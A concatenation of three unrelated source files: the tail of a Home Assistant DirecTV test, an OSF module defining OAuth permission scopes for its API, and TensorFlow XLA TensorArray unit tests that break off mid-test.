await async_media_stop(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("stop", "0")
with patch("directv.DIRECTV.tune") as tune_mock:
await async_play_media(hass, "channel", 312, MAIN_ENTITY_ID)
await hass.async_block_till_done()
tune_mock.assert_called_once_with("312", "0")
|
|
"""
Define a set of scopes to be used by COS Internal OAuth implementation, specifically tailored to work with APIv2.
List of scopes, nomenclature, and rationale can be found in the relevant "Login as OSF- phase 2" proposal document
"""
from collections import namedtuple
from website import settings
# Public scopes are described with 3 pieces of information: list of constituent scopes, a description, and whether or
# not this scope is available to be requested by the general public
class scope(namedtuple('scope', ['parts_', 'description', 'is_public'])):
""" Patch to add `ALWAYS_PUBLIC` scope to every selectable scope,
ensuring that public endpoints are accessible with any token.
"""
@property
def parts(self):
return frozenset((CoreScopes.ALWAYS_PUBLIC, )).union(self.parts_)
class CoreScopes(object):
"""
The smallest units of permission that can be granted- all other scopes are built out of these.
Each named constant is a single string."""
# IMPORTANT: All views should be based on the smallest number of Core scopes required to describe
# the data in that view
USERS_READ = 'users_read'
USERS_WRITE = 'users_write'
USERS_CREATE = 'users_create'
USER_EMAIL_READ = 'users.email_read'
USER_ADDON_READ = 'users.addon_read'
NODE_BASE_READ = 'nodes.base_read'
NODE_BASE_WRITE = 'nodes.base_write'
NODE_CHILDREN_READ = 'nodes.children_read'
NODE_CHILDREN_WRITE = 'nodes.children_write'
NODE_FORKS_READ = 'nodes.forks_read'
NODE_FORKS_WRITE = 'nodes.forks_write'
NODE_CONTRIBUTORS_READ = 'nodes.contributors_read'
NODE_CONTRIBUTORS_WRITE = 'nodes.contributors_write'
NODE_FILE_READ = 'nodes.files_read'
NODE_FILE_WRITE = 'nodes.files_write'
NODE_ADDON_READ = 'nodes.addon_read'
NODE_ADDON_WRITE = 'nodes.addon_write'
NODE_LINKS_READ = 'nodes.links_read'
NODE_LINKS_WRITE = 'nodes.links_write'
NODE_VIEW_ONLY_LINKS_READ = 'node.view_only_links_read'
NODE_VIEW_ONLY_LINKS_WRITE = 'node.view_only_links_write'
NODE_PREPRINTS_READ = 'node.preprints_read'
NODE_PREPRINTS_WRITE = 'node.preprints_write'
REGISTRATION_VIEW_ONLY_LINKS_READ = 'registration.view_only_links_read'
REGISTRATION_VIEW_ONLY_LINKS_WRITE = 'registration.view_only_links_write'
METASCHEMA_READ = 'metaschemas.read'
NODE_DRAFT_REGISTRATIONS_READ = 'nodes.draft_registrations_read'
NODE_DRAFT_REGISTRATIONS_WRITE = 'nodes.draft_registrations_write'
NODE_REGISTRATIONS_READ = 'nodes.registrations_read'
NODE_REGISTRATIONS_WRITE = 'nodes.registrations_write'
NODE_CITATIONS_READ = 'nodes.citations_read'
NODE_CITATIONS_WRITE = 'nodes.citations_write'
NODE_COMMENTS_READ = 'comments.data_read'
NODE_COMMENTS_WRITE = 'comments.data_write'
LICENSE_READ = 'license.data_read'
COMMENT_REPORTS_READ = 'comments.reports_read'
COMMENT_REPORTS_WRITE = 'comments.reports_write'
APPLICATIONS_READ = 'applications_read'
APPLICATIONS_WRITE = 'applications_write'
NODE_LOG_READ = 'nodes.logs_read'
TOKENS_READ = 'tokens_read'
TOKENS_WRITE = 'tokens_write'
INSTITUTION_READ = 'institutions_read'
SEARCH = 'search_read'
REVIEW_LOGS_READ = 'review_logs_read'
REVIEW_LOGS_WRITE = 'review_logs_write'
PROVIDERS_WRITE = 'providers_write'
NULL = 'null'
# NOTE: Use with extreme caution.
# This should NEVER be assigned to endpoints:
# - with mutable data,
# - that might contain *anything* that could be personally-identifiable,
# - as a write scope
ALWAYS_PUBLIC = 'always_public'
ORGANIZER_COLLECTIONS_BASE_READ = 'collections.base_read'
ORGANIZER_COLLECTIONS_BASE_WRITE = 'collections.base_write'
GUIDS_READ = 'guids.base_read'
WIKI_BASE_READ = 'wikis.base_read'
IDENTIFIERS_READ = 'identifiers.data_read'
class ComposedScopes(object):
"""
Composed scopes, listed in increasing order of access (most restrictive first). Each named constant is a tuple.
"""
# IMPORTANT: Composed scopes exist only as an internal implementation detail.
# All views should be based on selections from CoreScopes, above
# Users collection
USERS_READ = (CoreScopes.USERS_READ, )
USERS_WRITE = USERS_READ + (CoreScopes.USERS_WRITE,)
USERS_CREATE = USERS_READ + (CoreScopes.USERS_CREATE, )
# User extensions
USER_EMAIL_READ = (CoreScopes.USER_EMAIL_READ, )
# Applications collection
APPLICATIONS_READ = (CoreScopes.APPLICATIONS_READ, )
APPLICATIONS_WRITE = APPLICATIONS_READ + (CoreScopes.APPLICATIONS_WRITE,)
# Tokens collection
TOKENS_READ = (CoreScopes.TOKENS_READ,)
TOKENS_WRITE = TOKENS_READ + (CoreScopes.TOKENS_WRITE,)
# Guid redirect view
GUIDS_READ = (CoreScopes.GUIDS_READ, )
# Metaschemas collection
METASCHEMAS_READ = (CoreScopes.METASCHEMA_READ, )
# Draft registrations
DRAFT_READ = (CoreScopes.NODE_DRAFT_REGISTRATIONS_READ, )
DRAFT_WRITE = (CoreScopes.NODE_DRAFT_REGISTRATIONS_WRITE, )
# Identifier views
IDENTIFIERS_READ = (CoreScopes.IDENTIFIERS_READ, )
# Comment reports collection
COMMENT_REPORTS_READ = (CoreScopes.COMMENT_REPORTS_READ,)
COMMENT_REPORTS_WRITE = COMMENT_REPORTS_READ + (CoreScopes.COMMENT_REPORTS_WRITE,)
# Nodes collection.
# Base node data includes node metadata, links, children, and preprints.
NODE_METADATA_READ = (CoreScopes.NODE_BASE_READ, CoreScopes.NODE_CHILDREN_READ, CoreScopes.NODE_LINKS_READ,
CoreScopes.NODE_CITATIONS_READ, CoreScopes.NODE_COMMENTS_READ, CoreScopes.NODE_LOG_READ,
CoreScopes.NODE_FORKS_READ, CoreScopes.WIKI_BASE_READ, CoreScopes.LICENSE_READ,
CoreScopes.IDENTIFIERS_READ, CoreScopes.NODE_PREPRINTS_READ)
NODE_METADATA_WRITE = NODE_METADATA_READ + \
(CoreScopes.NODE_BASE_WRITE, CoreScopes.NODE_CHILDREN_WRITE, CoreScopes.NODE_LINKS_WRITE,
CoreScopes.NODE_CITATIONS_WRITE, CoreScopes.NODE_COMMENTS_WRITE, CoreScopes.NODE_FORKS_WRITE,
CoreScopes.NODE_PREPRINTS_WRITE)
# Organizer Collections collection
# Using Organizer Collections and the node links they collect. Reads Node Metadata.
ORGANIZER_READ = (CoreScopes.ORGANIZER_COLLECTIONS_BASE_READ,) + NODE_METADATA_READ
ORGANIZER_WRITE = ORGANIZER_READ + (CoreScopes.ORGANIZER_COLLECTIONS_BASE_WRITE, CoreScopes.NODE_LINKS_WRITE)
# Privileges relating to editing content uploaded under that node # TODO: Add wiki etc when implemented
NODE_DATA_READ = (CoreScopes.NODE_FILE_READ, )
NODE_DATA_WRITE = NODE_DATA_READ + \
(CoreScopes.NODE_FILE_WRITE, )
# Privileges relating to who can access a node (via contributors or registrations)
NODE_ACCESS_READ = (CoreScopes.NODE_CONTRIBUTORS_READ, CoreScopes.NODE_REGISTRATIONS_READ,
CoreScopes.NODE_VIEW_ONLY_LINKS_READ, CoreScopes.REGISTRATION_VIEW_ONLY_LINKS_READ)
NODE_ACCESS_WRITE = NODE_ACCESS_READ + \
(CoreScopes.NODE_CONTRIBUTORS_WRITE, CoreScopes.NODE_REGISTRATIONS_WRITE,
CoreScopes.NODE_VIEW_ONLY_LINKS_WRITE, CoreScopes.REGISTRATION_VIEW_ONLY_LINKS_WRITE)
# Combine all sets of node permissions into one convenience level
NODE_ALL_READ = NODE_METADATA_READ + NODE_DATA_READ + NODE_ACCESS_READ
NODE_ALL_WRITE = NODE_ALL_READ + NODE_METADATA_WRITE + NODE_DATA_WRITE + NODE_ACCESS_WRITE
# Reviews
REVIEWS_READ = (CoreScopes.REVIEW_LOGS_READ,)
REVIEWS_WRITE = (CoreScopes.REVIEW_LOGS_WRITE, CoreScopes.PROVIDERS_WRITE)
# Full permissions: all routes intended to be exposed to third party API users
FULL_READ = NODE_ALL_READ + USERS_READ + ORGANIZER_READ + GUIDS_READ + METASCHEMAS_READ + DRAFT_READ + REVIEWS_READ + (CoreScopes.INSTITUTION_READ, CoreScopes.SEARCH, )
FULL_WRITE = FULL_READ + NODE_ALL_WRITE + USERS_WRITE + ORGANIZER_WRITE + DRAFT_WRITE
# Admin permissions- includes functionality not intended for third-party use
ADMIN_LEVEL = FULL_WRITE + APPLICATIONS_WRITE + TOKENS_WRITE + COMMENT_REPORTS_WRITE + USERS_CREATE + REVIEWS_WRITE +\
(CoreScopes.USER_EMAIL_READ, CoreScopes.USER_ADDON_READ, CoreScopes.NODE_ADDON_READ, CoreScopes.NODE_ADDON_WRITE, )
# List of all publicly documented scopes, mapped to composed scopes defined above.
# Return as sets to enable fast comparisons of provided scopes vs those required by a given node
# These are the ***only*** scopes that will be recognized from CAS
public_scopes = {
'osf.full_read': scope(parts_=frozenset(ComposedScopes.FULL_READ),
description='View all information associated with this account, including for '
'private projects.',
is_public=True),
'osf.full_write': scope(parts_=frozenset(ComposedScopes.FULL_WRITE),
description='View and edit all information associated with this account, including for '
'private projects.',
is_public=True),
'osf.users.profile_read': scope(parts_=frozenset(ComposedScopes.USERS_READ),
description='Read your profile data',
is_public=True),
}
if settings.DEV_MODE:
public_scopes.update({
'osf.users.email_read': scope(parts_=frozenset(ComposedScopes.USER_EMAIL_READ),
description='Read your primary email address.',
is_public=True),
'osf.users.profile_write': scope(parts_=frozenset(ComposedScopes.USERS_WRITE),
description='Read and edit your profile data',
is_public=True),
'osf.nodes.metadata_read': scope(parts_=frozenset(ComposedScopes.NODE_METADATA_READ),
description='Read a list of all public and private nodes accessible to this '
'account, and view associated metadata such as project descriptions '
'and titles',
is_public=True),
'osf.nodes.metadata_write': scope(parts_=frozenset(ComposedScopes.NODE_METADATA_WRITE),
description='Read a list of all public and private nodes accessible to this '
'account, and view and edit associated metadata such as project '
'descriptions and titles',
is_public=True),
'osf.nodes.data_read': scope(parts_=frozenset(ComposedScopes.NODE_DATA_READ),
description='List and view files associated with any public or private projects '
'accessible to this account.',
is_public=True),
'osf.nodes.data_write': scope(parts_=frozenset(ComposedScopes.NODE_DATA_WRITE),
description='List, view, and update files associated with any public or private '
'projects accessible to this account.',
is_public=True),
'osf.nodes.access_read': scope(parts_=frozenset(ComposedScopes.NODE_ACCESS_READ),
description='View the contributors list and any established registrations '
'associated with public or private projects',
is_public=True),
'osf.nodes.access_write': scope(parts_=frozenset(ComposedScopes.NODE_ACCESS_WRITE),
description='View and edit the contributors list associated with public or '
'private projects accessible to this account. Also view and create '
'registrations.',
is_public=True), # TODO: Language: Does registrations endpoint allow creation of registrations? Is that planned?
'osf.nodes.full_read': scope(parts_=frozenset(ComposedScopes.NODE_ALL_READ),
description='View all metadata, files, and access rights associated with all public '
'and private projects accessible to this account.',
is_public=True),
'osf.nodes.full_write': scope(parts_=frozenset(ComposedScopes.NODE_ALL_WRITE),
description='View and edit all metadata, files, and access rights associated with '
'all public and private projects accessible to this account.',
is_public=True),
# Undocumented scopes that can not be requested by third parties (per CAS restriction)
'osf.users.create': scope(parts_=frozenset(ComposedScopes.USERS_CREATE),
description='This permission should only be granted to OSF collaborators. Allows a site to '
'programmatically create new users with this account.',
is_public=False),
'osf.admin': scope(parts_=frozenset(ComposedScopes.ADMIN_LEVEL),
description='This permission should only be granted to OSF administrators. Allows a site to '
'create, read, edit, and delete all information associated with this account.',
is_public=False),
})
def normalize_scopes(scopes):
"""
Given a list of public-facing scope names from a CAS token, return the list of internal scopes
This is useful for converting a single broad scope name (from CAS) into the small constituent parts
(as used by views)
:param list scopes: a list public facing scopes
"""
all_scopes = set()
for sc in scopes:
try:
scope_tuple = public_scopes[sc]
all_scopes |= scope_tuple.parts
except KeyError:
pass
return all_scopes
if __name__ == '__main__':
# Print some data to console, to help audit what views/core scopes map to a given public/composed scope
# Although represented internally as a set, print as a sorted list for readability.
from pprint import pprint as pp
pp({k: sorted(v.parts)
for k, v in public_scopes.iteritems()})
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for XLA TensorArray Ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def _make_converter(dtype):
def _converter(x):
return np.asarray(x).astype(dtype.as_numpy_dtype)
return _converter
class TensorArrayTest(xla_test.XLATestCase):
def testTensorArrayWriteRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3)
w0 = ta.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [[1.0, 3.0]])
w2 = w1.write(2, [[7.0, -8.5]])
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
flow = w2.flow
d0, d1, d2, flow_val = session.run([r0, r1, r2, flow])
self.assertAllEqual([[4.0, 5.0]], d0)
self.assertAllEqual([[1.0, 3.0]], d1)
self.assertAllEqual([[7.0, -8.5]], d2)
self.assertAllEqual([], flow_val.shape)
def _testTensorArrayWritePack(self, tf_dtype):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
w0 = ta.write(0, convert([[4.0, 5.0]]))
w1 = w0.write(1, convert([[6.0, 7.0]]))
w2 = w1.write(2, convert([[8.0, 9.0]]))
c0 = w2.stack()
self.assertAllEqual(
convert([[[4.0, 5.0]], [[6.0, 7.0]], [[8.0, 9.0]]]), c0.eval())
def testTensorArrayWritePack(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayWritePack(dtype)
def testEmptyTensorArrayPack(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
empty_element = np.zeros((0, 1), dtype=np.float32)
w0 = ta.write(0, empty_element)
w1 = w0.write(1, empty_element)
w2 = w1.write(2, empty_element)
c0 = w2.stack()
self.assertAllEqual([3, 0, 1], c0.eval().shape)
def _testTensorArrayWriteConcat(self, tf_dtype):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
w0 = ta.write(0, convert([[4.0, 5.0], [104.0, 105.0]]))
w1 = w0.write(1, convert([[6.0, 7.0], [106.0, 107.0]]))
w2 = w1.write(2, convert([[8.0, 9.0], [204.0, 205.0]]))
c0 = w2.concat()
self.assertAllEqual(
convert([[4.0, 5.0], [104.0, 105.0], [6.0, 7.0],
[106.0, 107.0], [8.0, 9.0], [204.0, 205.0]]), c0.eval())
def testTensorArrayWriteConcat(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayWriteConcat(dtype)
def _testTensorArrayUnpackRead(self, tf_dtype):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
# Unpack a vector into scalars
w0 = ta.unstack(convert([1.0, 2.0, 3.0]))
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert(1.0), d0)
self.assertAllEqual(convert(2.0), d1)
self.assertAllEqual(convert(3.0), d2)
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
# Unpack a matrix into vectors.
w1 = ta.unstack(convert([[1.0, 1.1], [2.0, 2.1], [3.0, 3.1]]))
r0 = w1.read(0)
r1 = w1.read(1)
r2 = w1.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([1.0, 1.1]), d0)
self.assertAllEqual(convert([2.0, 2.1]), d1)
self.assertAllEqual(convert([3.0, 3.1]), d2)
# Reset ta because we're going to change the shape, else shape
# inference will throw an error.
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
# Try unpacking an empty matrix, which should not cause an error.
w2 = ta.unstack(convert([[], [], []]))
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([]), d0)
self.assertAllEqual(convert([]), d1)
self.assertAllEqual(convert([]), d2)
def _testTensorArrayUnpackReadMaybeLegacy(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayUnpackRead(dtype)
def testTensorArrayUnpackRead(self):
self._testTensorArrayUnpackReadMaybeLegacy()
def _testTensorArraySplitRead(self, tf_dtype):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
# Split an empty vector.
lengths = constant_op.constant([0, 0, 0])
w0 = ta.split(convert([]), lengths=lengths)
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([]), d0)
self.assertAllEqual(convert([]), d1)
self.assertAllEqual(convert([]), d2)
# Split a vector.
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
lengths = constant_op.constant([1, 1, 1])
w0 = ta.split(convert([1.0, 2.0, 3.0]), lengths=lengths)
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([1.0]), d0)
self.assertAllEqual(convert([2.0]), d1)
self.assertAllEqual(convert([3.0]), d2)
# Split a matrix.
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
lengths = constant_op.constant([1, 1, 1])
w0 = ta.split(
convert([[1.0, 101.0], [2.0, 201.0], [3.0, 301.0]]), lengths=lengths)
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([[1.0, 101.0]]), d0)
self.assertAllEqual(convert([[2.0, 201.0]]), d1)
self.assertAllEqual(convert([[3.0, 301.0]]), d2)
def testTensorArraySplitRead(self):
for dtype in self.numeric_tf_types:
self._testTensorArraySplitRead(dtype)
def testTensorGradArrayWriteRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3)
w0 = ta.write(0, [[4.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, [[-3.0]])
g_ta = w2.grad("grad")
g_w0 = g_ta.write(0, [[5.0]])
g_w1 = g_w0.write(1, [[2.0]])
g_w2 = g_w1.write(2, [[-2.0]])
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
g_r0 = g_w2.read(0)
g_r1 = g_w2.read(1)
g_r2 = g_w2.read(2)
d0, d1, d2, g_d0, g_d1, g_d2 = session.run([r0, r1, r2, g_r0, g_r1, g_r2])
self.assertAllEqual([[4.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual([[-3.0]], d2)
self.assertAllEqual([[5.0]], g_d0)
self.assertAllEqual([[2.0]], g_d1)
self.assertAllEqual([[-2.0]], g_d2)
def testTensorGradArrayDynamicWriteRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3)
w0 = ta.write(0, [[4.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, [[-3.0]])
g_ta = w2.grad("grad") # Get gradient array here so we know the shape
s = w2.size()
g_s = g_ta.size()
g_w0 = g_ta.write(0, [[5.0]])
g_w1 = g_w0.write(1, [[2.0]])
g_w2 = g_w1.write(2, [[-2.0]])
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
g_r0 = g_w2.read(0)
g_r1 = g_w2.read(1)
g_r2 = g_w2.read(2)
d0, d1, d2, g_d0, g_d1, g_d2, vs, g_vs = session.run(
[r0, r1, r2, g_r0, g_r1, g_r2, s, g_s])
self.assertAllEqual([[4.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual([[-3.0]], d2)
self.assertAllEqual([[5.0]], g_d0)
self.assertAllEqual([[2.0]], g_d1)
self.assertAllEqual([[-2.0]], g_d2)
self.assertAllEqual(3, vs)
self.assertAllEqual(3, g_vs)
def testTensorGradAccessTwiceReceiveSameObject(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3,
element_shape=[1, 2])
g_ta_0 = ta.grad("grad")
g_ta_1 = ta.grad("grad")
with ops.control_dependencies([g_ta_0.write(0, [[4.0, 5.0]]).flow]):
# Write with one gradient handle, read with another copy of it
r1_0 = g_ta_1.read(0)
t_g_ta_0, t_g_ta_1, d_r1_0 = session.run(
[g_ta_0.handle.op, g_ta_1.handle.op, r1_0])
self.assertAllEqual(t_g_ta_0, t_g_ta_1)
self.assertAllEqual([[4.0, 5.0]], d_r1_0)
def testTensorArrayWriteWrongIndexOrDataTypeFails(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
# Test writing the wrong datatype.
with self.assertRaisesOpError(
"TensorArray dtype is float but op has dtype int32"):
ta.write(-1, np.int32(7)).flow.eval()
def testTensorArrayReadWrongIndexOrDataTypeFails(self):
# Find two different floating point types, create an array of
# the first type, but try to read the other type.
if len(self.float_types) > 1:
dtype1, dtype2 = list(self.float_types)[:2]
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtype1, tensor_array_name="foo", size=3)
w0 = ta.write(0, [[4.0, 5.0]])
# Test reading wrong datatype.
r0_bad = gen_data_flow_ops._tensor_array_read_v3(
handle=w0.handle, index=0, dtype=dtype2, flow_in=w0.flow)
with self.assertRaisesOpError("TensorArray dtype is "):
r0_bad.eval()
# Test reading from a different index than the one we wrote to
w0.read(1)
def testTensorArraySplitIncompatibleShapesFails(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3,
infer_shape=False)
with self.assertRaisesOpError(
r"value is not 1D"):
lengths = array_ops.placeholder(dtypes.int64)
ta.split([1.0, 2.0, 3.0], lengths).flow.eval(feed_dict={lengths: 1})
with self.assertRaisesOpError(
r"lengths must be equal: 1 vs. 2"):
ta.split([1.0, 2.0, 3.0], [1, 2, 3]).flow.eval()
with self.assertRaisesOpError(
r"value must have rank >= 1"):
ta.split(1.0, [1]).flow.eval()
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
infer_shape=False)
with self.assertRaisesOpError(
r"TensorArray's size is not equal to the size of lengths "
r"\(1 vs. 2\)"):
ta.split([1.0], [1]).flow.eval()
def _testTensorArrayWriteGradientAddMultipleAdds(self, dtype):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtype, tensor_array_name="foo", size=3, infer_shape=False)
c = lambda x: np.asarray(x, dtype=dtype.as_numpy_dtype)
w0 = ta.write(2, c(3.0))
w1 = w0.write(2, c(4.0))
ta_grad = w1.grad("grad")
w0_grad = ta_grad.write(2, c(3.0))
w1_grad = w0_grad.write(2, c(4.0))
w2_grad = w1_grad.write(2, c(5.0))
# Assert that aggregation works correctly
self.assertAllEqual(c(12.00), w2_grad.read(2).eval())
# Using differing shapes causes an exception
wb0_grad = ta_grad.write(1, c(1.0))
wb1_grad = wb0_grad.write(1, c([1.0]))
with self.assertRaisesOpError(
r"Mismatched TensorArray sizes"):
wb1_grad.flow.eval()
def testTensorArrayWriteGradientAddMultipleAdds(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayWriteGradientAddMultipleAdds(dtype)
def testMultiTensorArray(self):
with self.test_session(), self.test_scope():
h1 = tensor_array_ops.TensorArray(
size=1, dtype=dtypes.float32, tensor_array_name="foo")
w1 = h1.write(0, 4.0)
r1 = w1.read(0)
h2 = tensor_array_ops.TensorArray(
size=1, dtype=dtypes.float32, tensor_array_name="bar")
w2 = h2.write(0, 5.0)
r2 = w2.read(0)
r = r1 + r2
self.assertAllClose(9.0, r.eval())
def _testTensorArrayGradientWriteReadType(self, dtype):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.as_dtype(dtype),
tensor_array_name="foo",
size=3,
infer_shape=False)
c = lambda x: np.array(x, dtype=dtype)
value_0 = constant_op.constant(c([[4.0, 5.0]]))
value_1 = constant_op.constant(c([[3.0, 3.5]]))
w0 = ta.write(0, value_0)
w1 = w0.write(1, value_1)
r0 = w1.read(0)
r1 = w1.read(1)
r0_2 = w1.read(0)
# Test individual components' gradients
grad_just_r0 = gradients_impl.gradients(
ys=[r0], xs=[value_0], grad_ys=[c([[2.0, 3.0]])])
grad_just_r0_vals = session.run(grad_just_r0)
self.assertAllEqual(c([[2.0, 3.0]]), grad_just_r0_vals[0])
grad_r0_r0_2 = gradients_impl.gradients(
ys=[r0, r0_2],
xs=[value_0],
grad_ys=[c([[2.0, 3.0]]), c([[1.0, -1.0]])])
grad_r0_r0_2_vals = session.run(grad_r0_r0_2)
self.assertAllEqual(c([[3.0, 2.0]]), grad_r0_r0_2_vals[0])
grad_just_r1 = gradients_impl.gradients(
ys=[r1], xs=[value_1], grad_ys=[c([[-2.0, -4.0]])])
grad_just_r1_vals = session.run(grad_just_r1)
self.assertAllEqual(c([[-2.0, -4.0]]), grad_just_r1_vals[0])
# Test combined gradients
grad = gradients_impl.gradients(
ys=[r0, r0_2, r1],
xs=[value_0, value_1],
grad_ys=[c([[2.0, 3.0]]), c([[1.0, -1.0]]), c([[-2.0, -10.0]])])
grad_vals = session.run(grad)
self.assertEqual(len(grad_vals), 2)
self.assertAllEqual(c([[3.0, 2.0]]), grad_vals[0])
self.assertAllEqual(c([[-2.0, -10.0]]), grad_vals[1])
def testTensorArrayGradientWriteRead(self):
for dtype in self.numeric_types:
self._testTensorArrayGradientWriteReadType(dtype)
def _testTensorArrayGradientWritePackConcatAndRead(self):
with self.test_session() as sess, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
clear_after_read=False)
value_0 = constant_op.constant([-1.0, 1.0])
value_1 = constant_op.constant([-10.0, 10.0])
w0 = ta.write(0, value_0)
w1 = w0.write(1, value_1)
p0 = w1.stack()
r0 = w1.read(0)
s0 = w1.concat()
# Test gradient accumulation between read(0), pack(), and concat().
with ops.control_dependencies([p0, r0, s0]):
grad_r = gradients_impl.gradients(
ys=[p0, r0, s0],
xs=[value_0, value_1],
grad_ys=[
[[2.0, 3.0], [4.0, 5.0]], # stack gradient
[-0.5, 1.5], # read(0) gradient
[20.0, 30.0, 40.0, 50.0], # concat gradient
])
grad_vals = sess.run(grad_r) # 2 + 2 entries
self.assertAllClose([2.0 - 0.5 + 20.0, 3.0 + 1.5 + 30.0], grad_vals[0])
self.assertAllEqual([4.0 + 40.0, 5.0 + 50.0], grad_vals[1])
def testTensorArrayGradientWritePackConcatAndRead(self):
self._testTensorArrayGradientWritePackConcatAndRead()
def testTensorArrayReadTwice(self):
with self.test_session(), self.test_scope():
value = constant_op.constant([[1.0, -1.0], [10.0, -10.0]])
ta_readtwice = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
clear_after_read=False)
w_readtwice = ta_readtwice.unstack(value)
r0_readtwice = w_readtwice.read(0)
with ops.control_dependencies([r0_readtwice]):
r1_readtwice = w_readtwice.read(0)
self.assertAllEqual([1.0, -1.0], r1_readtwice.eval())
def _testTensorArrayGradientUnpackRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
clear_after_read=False)
value = constant_op.constant([[1.0, -1.0], [10.0, -10.0]])
w = ta.unstack(value)
r0 = w.read(0)
r0_1 = w.read(0)
r1 = w.read(1)
# Test combined gradients + aggregation of read(0).
grad = gradients_impl.gradients(
ys=[r0, r0_1, r1],
xs=[value],
grad_ys=[[2.0, 3.0], [-1.5, 1.5], [4.0, 5.0]])
grad_vals = session.run(grad)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([[2.0 - 1.5, 3.0 + 1.5], [4.0, 5.0]], grad_vals[0])
def testTensorArrayGradientUnpackRead(self):
self._testTensorArrayGradientUnpackRead()
def testTensorArrayGradientSplitConcat(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=2)
value = constant_op.constant(
[[1.0, -1.0], [10.0, -10.0], [100.0, -100.0], [1000.0, -1000.0]])
w = ta.split(value, [2, 2])
r = w.concat()
# Test combined gradients
grad = gradients_impl.gradients(
ys=[r],
xs=[value],
grad_ys=[[[2.0, -2.0], [20.0, -20.0], [200.0, -200.0],
[2000.0, -2000.0]]])
